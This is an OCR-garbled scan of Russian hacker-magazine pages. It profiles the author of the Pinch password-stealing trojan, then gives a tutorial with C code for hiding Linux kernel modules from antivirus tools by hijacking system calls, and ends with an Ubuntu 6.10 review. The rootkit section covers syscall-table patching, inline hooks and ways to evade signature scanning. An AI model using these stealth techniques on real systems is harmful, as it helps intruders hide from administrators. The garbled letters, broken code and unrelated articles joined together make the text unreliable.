повлияло на Александра, с тех пор основная сфера его 
деятельности — сетевая безопасность. 

Известность на этом поприще он получил среди ІСО-хаке- 
ров. СоЬап написал ТІСОСІіепІ - компонент для Дельфи, 
позволяющий сделать как свой безобидный аналог софту от 
Мирабилис, так и убойный флудер. Потом из-под его клави- 
атуры вышел еще один компонент, нареченный ІСОМепасе. 
Код, «помогающий понять проток I СО», пользовался боль- 
шим успехом у создателей сниферов. 

Выход же трояна РіпсЬ навсегда вписал ник его автора 
в историю русского хак-андеграунда. Впрочем, несмотря 
на разработку ряда ужасающих обычного юзера программ, 
хакингом как таковым Александр ни занимался никогда. 
Программирование, по его утверждению, куда интереснее 
угона чужих уинов и взлома сайтов. 

ПРОЕКТЫ 

РіпсЬ — это один из первых проектов, написанных СоЬап ом 
на Ассемблере. РіпсЬ является аналогом трояна, сделанно- 
го до этого БсІ-Теат. Первая его версия была разработана 
всего за две недели. 

Последующие, улучшенные версии трояна в 2003/ 

2004 годах вызвали настоящую эпидемию. РіпсЬ добы- 
вал пароли почти от всех клиентов ІСС1, почтовиков, 
ТоІаІСоттапсІег, включал в себя шпиона клавиатуры и уда- 
ленную консоль... При этом откомпилированный трой весил 
10 Кб и распространялся с открытыми исходниками. Более 
совершенного оружия скрипткидисам еще никто не дарил. 
Выложенные для скачивания в свободный доступ версии 
РіпсЬ сегодня палятся всеми антивирусами. Новые же 
релизы доступны лишь на коммерческой основе. 

СоЬап2к является автором МісгоОоіпег. Мы уже писали 
об этой проге — с помощью нее ты можешь отправить 
доверчивому юзеру фотку* голой- Курниковой, склеенную 
с МуОоот.ехе 



«ХАК-СЦЕН А СЕЙЧАС НА 90% СОСТОИТ ИЗ ПОДРОСТКОВ-НЕ^ 
УДАЧНИКОВ, КОТОРЫЕ, ВМЕСТО РАСПИТИЯ ПИВА И ГУЛЯНИИ 
ПО ДЕВКАМ, СТРОЯТ ИЗ СЕБЯ ХАКЕРОВ, ПРОТРОЯНИВАЯ/ЛО- 
МАЯ ВСЕХ ПОДРЯД» 






> Статья СоЬап’а о дыре в ослике 



> Программа МиШ РаззѵѵогсІ Кесоѵегу 



Александр написал несколько прог для дешифрации 
файлов винды, утилиту для «подсматривания» паролей 
и телефонных номеров от ОіаІ-ЦІр соединения на удален- 
ном ПК. Так что если есть еще несчастные модемщики 
— имейте ввиду. 

СоЬап2к не обошел вниманием и такую важную в нашем 
нелегком деле вещь, как криптографию. В частности, реко- 
мендую посмотреть его НазЬЫЬ! — понимающую боль- 
шинство современных алгоритмов библиотеку для Оеірбі. 
Да, обладателям элитных шестизначек напомню, что за 
ІССЫюоІз (набор софтин для аолхакеров) кланяться в ноги 
тоже нужно СоЬап’у. 

Александр, помимо хакерского софта, работает и над вполне 
миролюбивыми программами: ТѴуСЬа* и МРЗІпбо. ТѴуСЬа* 
является клиентом для обмена сообщениями, используя про- 
токол Ѵургезз сбаі, а МРЗІпбо показывает всю информацию об 
трЗ-файле — битрейт, частоту, исполнителя и прочее. 

Весь софт доступен на ѵѵѵѵѵѵ.соЬапз.пеІ:. Сначала этот 
ресурс создавался для одной локальной сети, но сейчас 
это официальный сайт Александра Демченко. 

ЧЕМ ЗАНИМАЕТСЯ СЕЙЧАС 

СоЬап2к проживает в Молдавии, учится на ИТ-спеца 
в Молдавском государственном университете. 

Сейчас работает над МиШ Ра55ѵѵогсІ Песоѵегу, это софт 
для восстановления забытых паролей ( раззгесоѵегѵ.сот і. 
Планирует разработать систему удаленного 



администрирования с нормальным интерфейсом, движок 
для электронных журналов (смерть ЖЖ!) и — самое глав- 
ное — компилятор Бейсика. Наверное, это необходимо 
для создания сплойтов под новую винду, не иначе. 
Периодически СоЬап2к пишет статьи и руководства 
на форумах сайтов ѵѵазт.ги . ѵѵеЬ-баск.т и в журнале 
«ХакерСпец» =). О месте работы рассказывает коротко 
и уклончиво: «Фрилансер». 

ХОББИ 

СоЬап увлекается спортивным боулингом. Любит читать 
и читает строго фантастику, самую разнообразную. 
Интересуется развитием демо-сцены. Админит сеть 
в своем дворе. ЛС 



> Конфигурирование трояна 



«УГОЛОВНЫЙ кодекс относительно компьютерных пре- 
ступлении далеко НЕ ИДЕАЛЕН. НО Я УК НЕ БОЮСЬ. ТЕХЖЕ 
АВТОРОВ СЕРВЕРА АРАСНЕ МОЖНО ОБВИНИТЬ В СОЗДАНИИ 
ВРЕДОНОСНЫХ ПРОГРАММ, ТАК КАК АРАСНЕ СПОСОБЕН ПО- 
СЛУЖИТЬ УТЕЧКЕ КОНФИДЕНЦИАЛЬНЫХ ДАННЫХ ИЛИ РАС- 
ПРОСТРАНЕНИЮ (ХОСТИНГУ) ВРЕДОНОСНЫХ ПРОГРАММ» 




ПРИЗРАКИ 

ЯДРА, 

ИЛИ 

МОДУЛИ- 

НЕВИДИМКИ 



СОЗДАНИЕ І_КМ-МОДУЛЕЙ, КОТОРЫЕ НЕВОЗМОЖНО ОБНАРУЖИТЬ 

Ш ? Ш ?. Потребность в создании невидимых модулей ядра растет с каждым днем — антиви- 
1®?*^ русная индустрия набирает обороты, на рынке присутствует множество ѵігдіпііу- 
<&><&> спескег'ов, проверяющих систему на предмет дефлорации. Кроме того, в хакерских 
ж у Ж журналах опубликована масса статей, рассказывающих, как прятать модули от штат- 
а&Ж ных средств ОС, в результате чего старые трюки уже не работают. Требуется что-то 
принципиально новое. В этой статье речь пойдет главным образом о сокрытии 
загружаемых модулей в Ьіпих, но предложенные приемы с ничуть не меньшим успе- 
Щур хом можно использовать в N1 и В5Е>. 



учший способ замаскировать 
модуль — не иметь модуля 
вообще. И это не шутка! Модули 
представляют собой унифициро- 
ванный механизм, обеспечивающий легальную 
загрузку/выгрузку компонентов ядра. Однако 
существуют и другие механизмы проникнове- 
ния на уровень ядра, некоторые из них описаны 
в моей статье «Захват нулевого кольца», но все 
они не универсальны и не надежны. С другой 
стороны, любая попытка явного стелсирования 
(смот ри статью «Поиграем с туксом в прятки») 
— это стопроцентное палево, выдающее факт 



вторжения с головой. Анти вирусу достаточ- 
но вручную пройтись по всем структурам 
ядра, а затем сравнить полученный результат 
с данными, возвращенными легальными средс- 
твами (например, командой ІзтосІ). 

Поэтому, чтобы не иметь проблем с маски- 
ровкой модуля, достаточно просто не регист- 
рировать его в списке модулей, отказаться от 
предоставляемого системой унифицированного 
интерфейса и размещать свое тело в ядерной 
памяти самостоятельно. Но для этого снача- 
ла нужно вырыть нору, ведь мыши, модули 
и прочие грызуны живут в норах, а на открытом 



пространстве быстро погибают, становясь 
легкой добычей лис, филинов и другихухающих 
хищников. 

О Руководящая идея 

Пишем модуль какобычно, но в процедуре 
іпіІ_тосІи1.е() выделяем блокпамяти вызовом 

деЦтее_радез (или любой другой функцией 

из семейства кппаІІосО, смотри врезку «Чем 
выделять память»). Копируем туда резидентный 
код, делающий что-то «полезное», перехватыва- 
ем все необходимые системные вызовы, застав- 
ляя их передаватьуправление резидентному 







* пая* И! 

> Сборка, загрузка и демонстрация работы невидимого модуля 



> Некорректный перехватсистемного вызова приводит ава- 
рийному завершению обратившегося к нему процесса, а не всего 
ядра целиком (какэто происходит в N1) 



коду (который, кстати говоря, должен быть 
перемещаемым, то есть сохранять работос- 
пособность независимо от базового адреса 
загрузки). После этого мы возвращаем -1 , сооб- 
щая системе, что вызов іпіі_тосІиІе() потерпел 
неудачу. 

В результате — модуль не загружается, но и вы- 
деленная им память не освобождается, а это 
значит, что резидентный код продолжает 
работать! Причем определить, каким имен- 
но модулем был выделен тот или иной блок 
памяти, в общем случае невозможно, и даже 
обнаружив резидентный код, антивирус не смо- 
жет сказать, откуда он тут взялся ! 



В качестве шасси мы будем использовать скелет 
І_КМ-драйвера, приведенный в уже упомянутой 
статье «Поиграем с туксом в прятки». Фак- 
тически мы только выбросим процедуру 
сІеапир_тосіиІе(), выполняющуюся при вы- 
грузке модуля из памяти (ведь наш модуль 
никогда не выгружается), добавим функцию 
іЬипк_тксІіг(), замещающую собой старый 
системный вызов 5У5_тксІіг(), и напишем не- 
сколько сток кода, обеспечивающих выделение 
памяти, копированиеібипк_тксІіг() и подмену 
оригинального 5У5_тксНг'а. Если отбросить 
комментарии, на все про все понадобится 
менее десяти строк на языке Си! 



іі ( ! пем_тксІі г ) гебигп -1 | 
ргіпЦк(«шеш еггог! \п») ; 

/* определяем адрес оригинально- 
го вызова 8У8_тксІіг (в данной версии 
модуля никак не используется) */ 

о1б._ткс1іг = зуз_са11_ЬаЫе [ЗУ8_ 
тксііг] | 

/* копируем резидентный код но- 
вого 8У8_ткс1іг в блок памяти, выде- 
ленный вызовом деб_бгее_раде */ 

тетеру ( пем_тксІі г , бЬ.ипк_ 
тксііг, кЬітк_епсі — кЬипк_тксІіг ) ; 



□ Ргоо^-о^-сопсері тосіиіе, 
или готовая демонстрация 

Давай в качестве разминки соорудим мини- 
мально работающий невидимый І_КМ-модуль 
для І_іпих с ядром версии 2.4 (ядро 2.6 потребует 
незначительных изменений, о которых я рас- 
скажу ниже). Вот в операционных системах 
В50 и ЫТ все сильно по-другому, хотя осно- 
вополагающий принциптотже: в процедуре 
инициализации выделяем память, копируем 
туда резидентный код, перехватываем один 
или несколько системных вызовов и возвра- 
щаем ошибку, приводящую к выгрузке модуля 
из памяти. Подробнее о технике написания 
6КМ- и КШ-модулей под В50 можно прочитать 
в моих предыдущих статьях. Также рекомен- 
дуется ознакомиться с циклом статей Роиг-Р'а 
на ѵѵазт'е, покрывающим собой все основные 
аспекты разработки драйверов: уууууу.ууэбгп. 
ги/агбсІе.рЬр?агбсІе=сІгѵѵѵ2к01 . 

Но вернемся к Ыпих'у. Наш «невидимка» будет 
перехватывать системный вызов 5У5_тксІіг, воз- 
вращая неизменную ошибку вместо передачи 
управления оригинальному зузсаіі'у, в результа- 
те чего создание новых директорий окажется не- 
возможным (во всяком случае, до перезагрузки 
системы). Это сделано для облегчения листинга 
и упрощения его понимания. Примеры реали- 
зации полноценных перехватчиков содержатся 
в моей статье «Системный шпионаже *піх». 



СЕРДЦЕВИНАНЕВИДИМОГО ЬКМ-МОДУЛЯ 

/* заглушка на функцию 8У8_тксІіг, 
всегда возвращающая -1, то есть 
блокирующая всякую попытку создания 
директории с сообщением об ошибке 
;)/ естественно, в полновесном 
вирусе или гообкіб ' е здесь должен 
быть обработчик, передающий уп- 
равление оригинальному системному 
вызову */ 

Дкипк_тксІіг ( ) 

{ 

геСигп -1; 

// директория не создается 

} 

/* ЕпбгуРоіпб : стартовая функция 
модуля, ответственная за его иници- 
ализацию и возвращающая 0 (при ус- 
пешной инициализации) и -1 (если 
в ходе инициализации были зафикси- 
рованы неустранимые ошибки */ 
іпі: іпіб_тосІи1е ( ѵоіб) 

{ 

// выделяем одну страницу ядер- 
ной памяти 

пем_тксІіг = (ѵоісі *) деб_ігее_ 

раде (СРР_КЕІШЕЬ) ; 

/ / проверяем успешность выделения 
памяти 



/* модифицируем таблицу систем- 
ных вызовов, заменяя старый вызов 
тксііг новой процедурой- заглушкой */ 
зуз_са11_баЫе [ЗУ8_ткбіг] = 
пем_тксііг ; 

// выводим отладочное сообщение, 
что все ОК 

ргіпбк ( " ЗУЗ_ткбіг із пом 
коокеб! \п" ) ; 

/* возвращаем ошибку, предотвращая 
загрузку модуля , но оставляя рези- 
дентный код в памяти * / 
гебигп -1; 

} 

Для переноса модуля на ядро 2.6 прототип функ- 
ции инициализации следует переписать так: 

іпіб ту_іпіб ( ) 

тоби1е_іпіб (ту_іпіб) ; 

Пара замечаний. Перечень системных вызовов 
(вместе со способом передачи аргументов) 
лежит на сІосБ.СБ.ир.ас.га/ргодгаттіпд/аБгп/ 
бегіск Іиі/БуБсаІІБ.ЫтІ . В частности, 
5У5_тксІіг принимает 2 аргумента: в ЕВХ 
передается указатель на имя создаваемой 
директории, в ЕСХ — флаги, 
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> Описание системных вызовов (вместе с аргумента- 
ми), найденное в интернете 
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> Механизм реализации системных вызовов в Ыпих 




> Какие именно 
системные вызо- 
вы перехватывать 
и как осуществлять 
фильтрацию, можно 
прочитать в любой 
статье, посвященной 
технологии создания 
гооікіі'ов, напри- 
мер: «АЬиве оЙЬе 
Ыпих КегпеІІог Рип 
апб Ргобі» (РИгаск 
#50), «ѴѴеакепіпд іНе 
Ыпих Кегпеі» (РИгаск 
# 52 ), «5иЬргос_ 
гооШиапбо 
Зиглив» (РИгаск 
#58), «Кегпеі Рооікіі 
Ехрегіепсев» 

(РИгаск #6і) и т.д. 



описанные в ткбіг(2). При желании, проанализи- 
ровав *ЕВХ, мы можем блокировать создание только 
определенных директорий, например тех, что ис- 
пользуют антивирусы и прочие защитные средства 
по умолчанию. Конечно, это демаскирует присутствие 
гооікіКа, но до некоторой степени затрудняет его удале- 
ние из системы. 

Перехват вувсаіі'ов осуществляется вполне стандартно 
и традиционно: ядро экспортирует переменную ехіегп 
ѵоіб 5у5_саІІ_іаЫе, указывающую на таблицу систем- 
ных вызовов, определения которых содержатся в файле 
/ивг/іпсІисіе/вув/вувсаІІ.Н. В частности, за ткбігзакреплено 
«имя» 5У5_ткбіг. 

Объявив в модуле переменную ехіегп ѵоіб *5у5_саІИаЫе[], 
мы получим доступ ко всем системным вызовам, которые 
только есть (включая нереализованные). оІб_ткбіг = 5у5_ 
саІІ_ІаЫе[5У5_тксІіг] заносит в переменную оШ_ткбігука- 
затель на системный вызов 5У5_ткбіг, а зу5_саІНаЫе[5У5_ 
тксііг] = пеѵѵ_тксІіг меняет его на пеѵѵ_ткбіг, который должен 
располагаться в ядерной области памяти. 

Внимание: если забыть скопировать пе\л/_ткбігв предвари- 
тельно выделенный блок памяти, то, после выгрузки модуля, 
5У5_ткбі г будет указывать на невыделенную область памяти 
и приложение, вызывавшее функцию тксііг, завершится 
с сигналом 1 1 — ведтепіаИоп Іаиік Но ядро продолжит 
функционировать в нормальном режиме, и никаких голубых 
экранов, которымитакславится N1, тугне произойдет. 
Необходимо отметить, что, на самом деле, ядро ничего не эк- 
спортирует (в привычной для КІТ-программистовтрактовке 
этого слова). В каталоге/Ьоо! лежит файл Зувіет. тар, содер- 
жащий символьную информацию обо всех«публичных» пе- 
ременных и процедурах ядра. Его-то загрузчик модулей 
и использует. Если этого файла нет (например, удален 
администратором из соображений безопасности), опреде- 
лять адрестаблицы символов приходится эвристическим 
путем, но это уже тема отдельной статьи. 

□ Сборка и загрузка 

Компиляция модулей никакой сложности не представляет. 
Ключи, опции оптимизации и прочие специи 
— по вкусу. В общем случае командная строка должна 
выглядеть так: 

# дсс — с тойиІе-Мйе.с — о той-МсМеп. о -02 

Если компиляция невидимого ИКМ-модуля прошла без 
ошибок, то на диске образуется файл тобиІе-Иібе.о, готовый 



к загрузке внутрь ядра командой іпвтоб (для автомати- 
ческой загрузки модуля вместе с операционной системой 
необходимо добавить его в файл /еіс/тосіиіев): 

# іпзшой той-Ыййеп . о 

Систематутже начнет ругаться на всех языках, которыетолько 
знает (точнее, на тех, под которые ее локализовали), типа 
модуль не загружен, неверные параметры, инвалид- 
ный 10 или ІРО. Но не стоит волноваться. Все идет 
по плану! Это просто результат работы геіигп -1 в 
іпіі_тобиІе(). 

Главное — то, что в списке загруженных модулей (выводи- 
мых командой ІвгпосІ или ее аналогом сИ #=/ргос/тобиІе5 
Ьв=1) наш модуль отсутствует, как будто бы мы ни когда туда 
его не загружали. Однако команда ткбігдаетошибку, убеж- 
дая нас в том, что резидентный код успешно обустроился на 
конспиративной квартире и ведетактивную борьбу! 

# тксііг пегиті 

тксііг: невозможно создать каталог 

’пегиті' : ОрегаДіоп пок регтіДДей 

□ Резидентный код в камуфляжных штатах 

Замаскироваться-то мы замаскировались, но подобное 
грубое вторжение в таблицу системных вызовов наврядли 
сможет долго оставаться незамеченным. Существует куча 
утилит, проверяющих целостность 5у5_саІІ_ІаЫе и автомати- 
чески восстанавливающих ее, отбирая у резидентного кода 
все бразды правления. Но даже без них указатель на сис- 
темный вызов, расположенный вне ядра, вызывает слишком 
большие подозрения. 

Чтобы не сгореть на первом же допросе, необходимо слегка 
изменить тактику: оставить в покое 5у5_саІІ_іаЫе и внед- 
ритьщтр на резидентный код в начало перехватываемого 
системного вызова. Впрочем, щтр в начале системных 
вызовов — весьма популярный (а потому широко извест- 
ный) способ перехвата, и опытныеадмины нас все равно 
запалят. Чтобы избежать расправы, необходимо внедряться 
не в начало, а в середину системных вызовов! А для этого 
надо тащить за собой целый дизассемблер, поскольку 
длина х86-инструкций непостоянна и варьируется в весьма 
широких пределах. Однако можно пойти на хитрость и искать 
плацдарм для внедрения эвристическим путем, например 
по сигнатуре 85Н СОИ * 7хН, соответствующей конструкции 
ТЕ5Т ЕАХ, ЕАХ/Эх іа гдеі. Звездочка означает, что между ТЕ5Т 
ЕАХ.ЕАХ и Эх іа гдеі может быть расположено 
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> Справочная тап-страница по функциям выделения ядерной памяти 



несколько машинных команд. Во избежание 
ложных срабатываний не следует выбирать 
расстояние между85Ь СОИ и 7хЬ более че- 
тырех байт. Естественно, внедряя ітр пеаг 
оиг_гезісіепі_сосІе поверхТЕЗТ ЕАХ.ЕАХ..., не- 
обходимо предварительно сохранить затирае- 
мое содержание в своем собственном буфере 
и выполнитьего перед передачей управления 
оригинальному системному вызову. 

Важно отметить, что подобный способ пере- 
хвата не является на 1 00% надежным 
и безопасным, поскольку существует ничтож- 
ная вероятность, что выполнение процесса 
будет прервано в момент установки щтр'а 
и тогда он рухнет. Но гооШі'ы об этом могут 
не беспокоиться, да и падения такие будут 
происходить не чаще, чем раз в сто лет. 



номусистемному вызову — отбираем атрибуты 
обратно. Если же резидентный код пытается 
читать кто-то еще — подсовываем другую страницу 
(например, путем манипуляций с каталогом 



@ЧЕМ ВЫДЕЛЯТЬ ПАМЯТЬ □ 



Для выделения памяти ядро предостав- 
ляетбогатый ассортимент функций, опи- 
санных в кгтта 11ос(9) . В первую очередь 
хотелось бы отметить функцию ѵоіб 
*ктаІІос(5І2е_і5І2е, іпі ргіогку), гдезіге 
— размерзапрашиваемого блока в байтах 



[принимает одно из следующих значе- 
ний: 24, 56, 120, 244, 500, 1012, 2032, 4072, 



8168, 16360, 32744, 65512 или 



О Маскируемся в адресном пространстве 

Вот теперь мы замаскировалисьтак 
замаскировались! Только хвост все равно 
из норы торчит, и наш резидентный код 
может быть найден тривиальным сигнатур- 
ным поиском путем сканирования памяти 
ядра (естественно, при ус-ловии, что он 
известен антивирусам, а все популярные 
гооікіі'ы — известны им). Чтобы остаться 
необнаруженными, необходимо исполь- 
зоватьлибо продвинутые полиморфные 
методики, либо один способ, о котором 
нельзя не рассказать. 

Сбрасываем страницы, принадлежащие наше- 
му резидентному коду, в по_ассев5 вешаем об- 
работчик исключений, отлавливающий ошибки 
доступа к памяти, и терпеливождем. Как только 
возникнет исключение, смотрим: если на 
вершине стека находится адрес возврата 
в системный вызов (для этого перехват должен 
осуществляться командой САН, а не щтр), то 
возвращаем все атрибуты на место и даем 
зеленый светна выполнение резидентного 
кода, а в моментпередачиуправления оригинала- 



131048). В противном случае функция авто- 
матически округлит размер блока в боль- 
шую сторону. 

Параметр ргіогііу задает стратегию выделе- 
ния памяти. ѲЕР_АТОМІС выделяеттребуе- 
мую память немедленно (при необходимости 
вытесняя другие страницы на диск); 6ЕР_ 
КЕРЫЕБ резервирует блок памяти, выде- 
ляя страницы памяти по мере обращения 
к ним; 6ЕР_ВІІЕЕЕР никогда не вытесняет 



другие страницы, и если запрошенная 



память недоступна, с выделением наступает 
облом. Существуют и другие стратегии 



выделения, но нам они не интересны, пос- 
кольку фактически приходится выбирать 
между ѲЕР_АТОМІС и 6ЕР_КЕРЫЕЕ. Обычно 
используют6ЕР_КЕРМЕЕ, таккакон ведет 
себя не стольагрессивно. 

Если нужно выделить всего одну страницу 



памяти, имеетсмысл воспользоваться 



функцией ипвідпеб Іопд деМгее_раде(іп! 

ргіогііу), где ргіогііутотже самый, что 
и у ктаІАосО. Ее ближайшая родственница 
де1_бгее_раде(іп1; ргіогку) отличается 



страниц). Более сложные реализации не восста- 
навливают атрибуты, а используют пошаговую 
трассировку резидентного кода или дажеэмулиру- 
ютего выполнение, но это уже перебор. 

Все просто, только вот мыщъха терзают смутные 
сомнения на счет эффективности. Но ведь 
не он же этоттрюк придумал! Так что может 
и покритиковать. Первое и самое главное. 
Читать резидентный код в памяти ядра могут 
не только антивирусы, но и само ядро при 
вытеснении его на диск или переходе 
в спящий режим. Как следствие 
— возникает конфликт, и гооікіі работает 
нестабильно. Второе — код обработчика 
остается незащищенным (а защитить его 
никак нельзя, поскольку кто-то же должен 
обрабатывать исключения), следовательно 
, он элементарно палится по сигнатурному 
поиску. Как говорится, за что боролись, на 
то и напоролись. Так что без полиморфизма 
никуда! НС 



только тем, что обнуляет память сразу же 



после выделения, что несколько снижает 



производительность. И ктомужемывсе 
равно будем копировать резидентный код 
через тетсруО, так что содержимое стра- 
ницы нам не критично. 

Определения всех функций (с краткими 



комментариями) содержатся в заголовоч- 
ном файле Ііпих/тт.Ь. 



ГРАБЕЖ 

ОТЛАДОЧНОГО ВЫВОДА 



Функция ргіпікО, используемая нами, поз- 
воляет генерировать отладочный вывод, ко- 
торый не появляется на экране, чтобы 
не смущать пользователей обилием тех- 
нической информации, в которой они все 
равно ни разу не разбираются. Что ж, впол- 



не логично, что отладочный вывод должен 



быть доступен только разработчикам, но как 
же до него добраться? N1 имеет 
«Системный Журнал» (и притом 
не один), но в Біпих'е ничего похожего 
нет, и отладочный вывод бесхитростно 
валится в текстовый файл /ргос/кгпвд, кото- 



рый можно прочитать утилитой саі: 



# саО /ргос/кшзд > бііепате 



Лучше использовать специализированные 
средства, вроде штатной утилиты бтезд или 



иксовои гляделки: 
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СЕРГЕЙ СУПРУНОВ] 

/ АМ8АЫО@ПАМВІ.ЕП 



я И НУ КС 

ДЛЯ ЛЮДЕЙ: 



Появившись пару лет назад, он уже через несколько месяцев прочно завладел верши- 
ной рейтинга Ці$і:гоѴѴаі:сЪ.сот, оставив своим конкурентам — могучим ОрепЗІІЗЕ, 
Мапйгіѵа и Ресіога — возможность сражаться лишь за второе место. Открытость и мощ- 
ная коммерческая поддержка стали той адской смесью, которая заставила взорваться 
мир Ьіпих. В октябре 2006 года вышла новая версия этого уже легендарного дистрибу- 
тива — іЛшпШ 6.10, призванная снова потрясти мир. Вот в него-то мы и заглянем. 



ОС чего все начиналось 

Не та к давно — в октябре 2004 года — на свет 
появился «еще один» дистрибутив Иі п их. 
Патронируемый мультимиллионером Марком 
Шаттлвортом, он получил имя ІІЬипіи (что 
в переводе с одного из африканских языков 
означает «гуманность в отношении к дру- 
гим») и номер версии 4.10 — в соответствии 
с годом и месяцем релиза. Да и несолидно 
как-то было выходить на рынок с версией 
1.0, где царствовали 51І5Е 9.1 , Ресіога 2, 
Мапбгакеііпих 10.1. Эта традиция нумерации 
сохраняется и сейчас. Вообще, разработ- 
чики ІІЬипІи стараются придерживаться 
строгого полугодового цикла новых релизов 

— потом были 5.04, 5.1 0... Правда, 6.04 был 
перенесен аж на 6.06, потому что его выпус- 
кали с прицелом на корпоративный рынок 

и хотели сделать максимально стабильным. 
Кстати, 6.06 вышел с долгосрочной поддер- 
жкой (І_Т5 — Іо п д ііте зи ррогі) , то есть его 
пользователи могут получать обновления 
в течение трех лет (для серверного варианта 

— в течение пяти). 

А вот на версии 6.10, которая была оперативно 
выпущена за четыре месяца, разработчики 
решили наверстать упущенные 2 месяца и вер- 



нуться в прежний график релизов. В отличие 
от 6.06, эта версия получиласьдостаточно 
передовой. Впрочем, о версиях вошедших 
в него пакетов у нас еще будет повод поговорить 
чуть позже. 

О Почему ІІЬипІи так крут? 

Чемже ІІЬипІи завоевал такую любовь публики? 
Отдругих популярных дистрибутивов его, 
прежде всего, отличает родство с ОеЬіап и, как 
следствие, поддержка репозитариев открытого 
ПО, разрабатываемого обширным сообществом 
пользователей. Но в отличие от родителя, ре- 
лизы которого радуют нас редко и нерегулярно, 
ІІЬипІи старается четко выдерживать полуго- 
довой цикл, благодаря финансовому содейс- 
твию Шаттлворта и основанной им компании 
Сапопісаі Ш. Также можно отметить очень 
хорошую поддержку оборудования. Наконец, 
в качестве основной цели ІІЬипІи всегда декла- 
рировалосьсоздание системы, максимально 
простой для новичков в мире Ыпих и в тоже 
время удобной и полезной для квалифици- 
рованных пользователей. Учитывая высокую 
популярность дистрибутива, разработчикам 
удалось совместить несовместимое. 

Итак, приступим к осмотру. 



□ «Живой» диск 

Последнее время стало модно совмещать 
инсталляционные диски с ЫѵеСО. Так поступают 
и в бепіоо, начиная с 2006.0 (правда, инстал- 
лятортам очень часто прибивал насмерть 
таблицу разделов жесткого диска, но в 2006.1 
ребята исправились); в ІІЬипШ впервыетакая 
схема была опробована на 6.06 (5.1 0 шла еще на 
двух дисках: один — ЫѵеСО для «попробовать», 
второй — для инсталляции на жесткий диск). 

Это означает, что, получив один СО-диск, ты 
вставляешь его в привод, загружаешься и име- 
ешь полноценную рабочую средудистрибутива 
ЫІЬипІи. Можно проверить, насколько хорошо 
распозналосьтвое оборудование, попробовать 
воспроизвести различныезвуковые и ви- 
деофайлы, которые можно найти в каталоге 
Ехатріез на рабочем столе... Кстати, там есть 
файлик Ехрегіепсе иЬипШ.одд — это видеоза- 
пись, в которой Нельсон Мандела объясняет 
значение слова «иЬиЫи». 

Болеетого.ты можешь даже полноценно пора- 
ботать в ОрепОЫсе.огд или ЕігеЫх. Понятно, что 
медленная скорость работы с Сй не позволит 
получить от этого процесса должное удовольс- 
твие, но, по крайней мере, можно будетубедить- 
ся, что все функционирует. 
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СНОВА 

В ДЕСЯТКУ 




ОБЗОР иВІШТУ 6.10 — НОВОЙ ВЕРСИИ самого популярного дистрибутива 



Правда, должен заметить, что мне этот ЫѵеСО не 
понравился — слишком уж все медленно (хотя 
не исключаю, что всему виной мой привод), да 
и 256 Мбдля полного счастья явно нехвата- 
ет. Кстати, небольшой совет — если вручную 
смонтировать своп (его все равно придется 
создавать, если надумаешь «прописывать» 
ІІЬипШ на своем винчестере), то работа пойдет 
заметно шустрее: 

# есізо " /сбеѵ/МаБ попе зѵ\/ар зы 0 0" 

>> /еОс/бзДаЬ 

# зѵ^ароп -а 

В этом примере/беѵ/Ьба5 — раздел, создан- 
ный каксвоп. Если его еще нет, то можно 
создать, попрактиковавшисьс утилитами бсіізк 
и ткзѵѵар. 

Итак, убедившись, что все работает и, самое 
главное, что онотебе нравится, можно запускать 
инсталляцию. Иконка лежит прямо на рабочем 
столе. Двойной щелчок — и переходим к 
установке... 

□ По местам стоять! 

Установка состоит всего из шести простых 
шагов. На первомтебя попросятвыбратьязык, 
на котором с тобой будет общаться инсталлятор 
и который в дальнейшем будет принят в качес- 
тве основного во вновьустановленной системе. 
Русский среди предлагаемых вариантов 
присутствует (в случае с ІІЬііпШ вообще сложно 



найти язык, для которогоон не локализован), и, 
забегая вперед, скажу, что качество локализа- 
ции дистрибутива довольно высокое. 

На втором шаге нужно будет выбрать часовой 
пояс и подправитьтекущее время. Если вдруг 
все будет предложено правильно поумолчанию, 
но инсталлятор откажется выпускать тебя на 
следующий шаг, просто сделай вид, что ты что- 
то меняешь, и щелкни «Далее» еще раз. 
Шагтретий — выбор раскладки клавиатуры. 
Рекомендую отметить «Ризвіа — ѴѴІпкеуз», 
впрочем, это уже кому какудобнее. 

Подходим к более серьезным вещам. На 
четвертом шаге нужно будет создать для себя 
учетную запись в системе — здесь важно не 
забыть введенный пароль. Кстати, пусть тебя 
не смущает, что нигде не предлагается ввести 
пароль суперпользователя. Так надо. 

А теперь самый серьезный шаг — нужно подгото- 
вить разделы, куда будет выполняться установ- 
ка. Если ты готов отдать под ІІЬипіи весь диск 
— смело выделяй второй пункт. Третий пойдет, 
если на диске точно есть свободный раздел, но 
лень его отмечать вручную, система сама его 
найдет и разметит. В особотяжелых случаях, 
когда приходится лавировать между разделами 
ѴѴІпбоѵѵв и ЕгееВВй, при этом незацепляя своп, 
лучше прибегнутьк ручному разбиению диска. 
Даже если что-то сломаешь, то, по крайней мере, 
точно будешьзнать, кто в этом виноват ;-). 
Дележдиска выполняется в 2 этапа. На первом 
нужно будете помощью утилиты ОРаНеб под- 



готовить необходимые разделы (как минимум 
потребуется один раздел под корень и один 
небольшой — под своп). На втором этапе надо 
назначить разделамточки монтирования. 
Особенно внимательно отнесись к «птичкам» 
справа — если ты хочешь подключить к новой 
системе какой-то из существующих разделов 
с имеющимися на нем данными (например, так 
удобно таскать за собой домашний каталог из 
системы в систему), то обязательно убедись, что 
переформатирование не отмечено. 

Ну, и чисто формальный шестой шаг — нужно 
внимательно прочитать сообщение инсталля- 
тора о том, что он сейчас собирается сделать, 
и нажать заветную кнопочку «Іпзіаіі» — пути на- 
зад уже не будет. Копирование займет минут20 
(если машина достаточно быстрая, то в это вре- 
мя можноздесьже поиграться или побродить по 
интернету), после чего следует перезагрузиться. 
На этом этапе тебя ждет одна неприятность 
— ІІЬипіи молча ставит свой любимый ѲРІІВ (на 
шестом шаге можно попытаться указать другой 
раздел для его инсталляции), так что будь готов 
к тому, что он и станеттвоим загрузчиком по 
умолчанию. 

О Первое знакомство 

С внешним видом загрузчика разработчики ре- 
шили долго не возиться — неброское черно-бе- 
лое меню и все. Сразу вспоминается шикарный 
фон загрузчика Ѳепіоо и становится немножко 
грустно... Впрочем, главное — внутри. 
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> \ллллл/.иЬип1и.сот 

— основной сайт 
дистрибутива. 
ѵѵѵѵѵѵ.сІеЫап.огд 

— много полезного 
можно найти на сайте 
«родителя». 
еазѵиЬипІи. 
ІтеесопігіЬ.огд 

— здесь лежит 
ЕазуБЬипШ. 




>Незабывай, что 
ІІЬипІи — дистрибу- 
тив открытый. Если 
тебе что-то в нем 
не нравится или 
хотелось бы сделать 
лучше, присоеди- 
няйся к сообществу 
и вноси свой посиль- 
ный вклад! 





